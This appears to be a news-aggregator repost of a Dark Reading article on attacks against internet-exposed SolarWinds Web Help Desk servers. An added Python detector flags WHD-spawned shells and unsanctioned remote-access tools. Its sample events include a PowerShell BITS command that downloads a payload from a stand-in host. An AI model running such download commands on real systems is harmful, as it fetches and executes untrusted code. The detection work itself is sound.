Security News

Cybersecurity news aggregator

CRITICAL Vulnerabilities Dark Reading

SolarWinds WHD Attacks Highlight Risks of Exposed Apps


Organizations that have exposed their instances of Web Help Desk to the public Internet have inadvertently made them prime targets for attackers.

Rob Wright, Senior News Director, Dark Reading
February 10, 2026

Threat actors are pouncing on new vulnerabilities in SolarWinds Web Help Desk (WHD), further illustrating the risks of applications exposed to the public Internet. SolarWinds WHD is an IT support and asset management platform used by enterprises and government agencies.

Several vendors in recent days have warned of exploitation of vulnerabilities in WHD, though it's not entirely clear which bugs are under attack. Last week, the US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551, a critical deserialization flaw, to the Known Exploited Vulnerabilities (KEV) Catalog. CVE-2025-40551 was initially disclosed by SolarWinds on Jan. 28, along with five other vulnerabilities in WHD.

In a blog post last Friday, Microsoft said it observed multistage intrusions against WHD instances but said it couldn't determine whether the attacks exploited the recent flaws or older vulnerabilities such as CVE-2025-26399, a critical remote code execution flaw disclosed in September 2025. That flaw was a patch bypass for an earlier bug, tracked as CVE-2024-28988, which itself was a patch bypass for an even older vulnerability.

"Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold," Microsoft wrote in its blog post.

What is clear, however, is that some organizations have exposed their WHD instances on the public Internet, making them prime targets for attackers.

Publicly Accessible WHDs at Higher Risk

In the attacks observed by the Microsoft Defender Research Team, the threat actors used living-off-the-land (LotL) techniques and legitimate administrative tools like Zoho ManageEngine for lateral movement through victims' networks to target high-value assets. But the intrusions began with Internet-exposed WHD instances, which gave attackers an initial foothold in the network.

"This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored," Microsoft wrote.

After the threat actors successfully exploited the flaws, "the compromised service of a WHD instance spawned PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution," according to the blog post.

Huntress observed similar activity targeting WHD instances. In a blog post on Sunday, Huntress researchers noted that in a Feb. 7 intrusion, the threat actors "rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence" after gaining access via the WHD instance.

The threat actors also deployed Velociraptor, a digital forensics and incident response (DFIR) tool, for command-and-control (C2) purposes. A China-linked threat group tracked as Storm-2603 was observed in October 2025 abusing Velociraptor for ransomware attacks.
Huntress warned that WHD administrative interfaces should not be publicly accessible on the Internet. Anna Pham, senior hunt and response analyst at Huntress and co-author of the blog post, tells Dark Reading that such exposure "dramatically lowers the bar" for attackers but isn't strictly a prerequisite for exploitation.

"An attacker with any network access to a vulnerable WHD instance could potentially exploit the same flaws," Pham says. "Internet exposure simply makes these instances discoverable at scale and removes the need for any prior foothold."

Last week, the Shadowserver Foundation said in a post on X that its Internet scans for CVE-2025-40551 show approximately 170 vulnerable WHD instances.

Mitigating Threats to SolarWinds WHD

Huntress urged organizations to put their WHD instances behind firewalls or VPNs and to remove direct Internet access to administrator paths. John Hammond, principal security researcher at Huntress and co-author of the blog post, says that while threat actors can exploit the flaws with local access to the instances, public exposure makes the application a target for "pray and spray" attacks by threat actors looking to gain initial access.

Additionally, customers should update their WHD instances to version 2026.1 or later, and review the hosts for any unauthorized remote access tools like Zoho Assist and Velociraptor. Microsoft also recommended that organizations evict any remote monitoring and management (RMM) tools in the network like Zoho ManageEngine, and rotate credentials for WHD service and administrator accounts as well as any accounts reachable through the platform.

About the Author

Rob Wright, Senior News Director, Dark Reading

Rob Wright is a longtime reporter with more than 25 years of experience as a technology journalist. Prior to joining Dark Reading as senior news director, he spent more than a decade at TechTarget's SearchSecurity in various roles, including senior news director, executive editor and editorial director. Before that, he worked for several years at CRN, Tom's Hardware Guide, and VARBusiness Magazine covering a variety of technology beats and trends. Prior to becoming a technology journalist in 2000, he worked as a weekly and daily newspaper reporter in Virginia, where he won three Virginia Press Association awards in 1998 and 1999. He graduated from the University of Richmond in 1997 with a degree in journalism and English. A native of Massachusetts, he lives in the Boston area.
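The two host-level behaviours the article reports (a WHD service process spawning PowerShell that uses BITS for payload download, and remote-access tooling such as Velociraptor, Zoho products and Cloudflare tunnels turning up on hosts where nobody sanctioned it) are the kind of thing a defender reviewing WHD hosts would want to triage from process-creation telemetry. The Python below is an added example, not code from Dark Reading, Microsoft or Huntress. It runs over constructed sample events; the WHD install path, the assumption that WHD runs under a Java/Tomcat process, and the binary-name patterns in RMM_TOOLS are all assumptions to be tuned to your own estate.

```python
"""Added example (not Dark Reading's, Microsoft's or Huntress's code).

Triages constructed process-creation events for two behaviours: a WHD service
process spawning a shell (optionally with BITS in the command line) and
remote-access/RMM tooling on hosts where it is not sanctioned.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


# Assumption: WHD runs as a Java/Tomcat service. In production, scope this to
# the WHD install path rather than any java.exe, or unrelated JVMs get flagged.
WHD_PARENT = re.compile(r"webhelpdesk|java|tomcat", re.I)
SPAWNED_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bitsadmin.exe"}
BITS_CMDLINE = re.compile(r"start-bitstransfer|bitsadmin", re.I)
# Assumption: name patterns for the tooling the article mentions.
RMM_TOOLS = {
    "velociraptor": re.compile(r"velociraptor", re.I),
    "cloudflared": re.compile(r"cloudflared", re.I),
    "zoho": re.compile(r"zoho|manageengine", re.I),
}


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows or POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage_events(events, approved=None):
    """Return Findings for WHD-spawned shells and unsanctioned remote tools.

    approved maps host -> set of tool names legitimately deployed there
    (e.g. a DFIR host running Velociraptor), so those are not reported.
    """
    approved = approved or {}
    findings = []
    for ev in events:
        host = ev["host"]
        parent_path = ev.get("parent_image", "")
        parent = basename(parent_path)
        child = basename(ev.get("image", ""))
        cmdline = ev.get("command_line", "")

        # Rule 1: the WHD service process itself spawning a shell.
        if WHD_PARENT.search(parent_path) and child in SPAWNED_SHELLS:
            via = " (BITS in command line)" if BITS_CMDLINE.search(cmdline) else ""
            findings.append(Finding(host, "whd-spawned-shell", f"{parent} -> {child}{via}"))

        # Rule 2: remote-access tooling not on this host's approved list.
        for tool, pattern in RMM_TOOLS.items():
            if tool in approved.get(host, ()):
                continue
            if pattern.search(child) or pattern.search(cmdline):
                findings.append(Finding(host, "unauthorized-remote-tool", f"{tool}: {child}"))
    return findings


# Constructed sample events (not real telemetry); paths are assumptions.
SAMPLE_EVENTS = [
    {  # WHD's Java service spawning PowerShell that pulls a file via BITS
        "host": "whd-01",
        "parent_image": r"C:\Program Files\WebHelpDesk\bin\java.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe Start-BitsTransfer -Source http://example.invalid/dl.bin -Destination C:\Windows\Temp\dl.bin",
    },
    {  # Velociraptor appearing on the same WHD host
        "host": "whd-01",
        "parent_image": r"C:\Program Files\WebHelpDesk\bin\java.exe",
        "image": r"C:\ProgramData\velociraptor.exe",
        "command_line": "velociraptor.exe client -c client.config.yaml",
    },
    {  # Cloudflare tunnel client on a file server
        "host": "fs-02",
        "parent_image": r"C:\Windows\System32\services.exe",
        "image": r"C:\Windows\Temp\cloudflared.exe",
        "command_line": "cloudflared.exe tunnel run",
    },
    {  # Benign: interactive PowerShell launched from Explorer
        "host": "ws-17",
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe Get-Process",
    },
    {  # Sanctioned Velociraptor on the DFIR team's own host
        "host": "dfir-03",
        "parent_image": r"C:\Windows\System32\services.exe",
        "image": r"C:\Tools\velociraptor.exe",
        "command_line": "velociraptor.exe client -c client.config.yaml",
    },
]

APPROVED = {"dfir-03": {"velociraptor"}}


def run_demo():
    """Triage the constructed events; returns three findings."""
    return triage_events(SAMPLE_EVENTS, APPROVED)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f.host:8} {f.rule:26} {f.detail}")
```

The approved-tools map matters in practice: Velociraptor and Zoho products are legitimate on hosts where the IT or DFIR team deployed them, so the signal is the tool appearing somewhere it has no business being (such as the WHD server itself), not the tool's existence. The parent-process rule is the higher-fidelity one; a web application's service account has no routine reason to launch PowerShell or bitsadmin.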
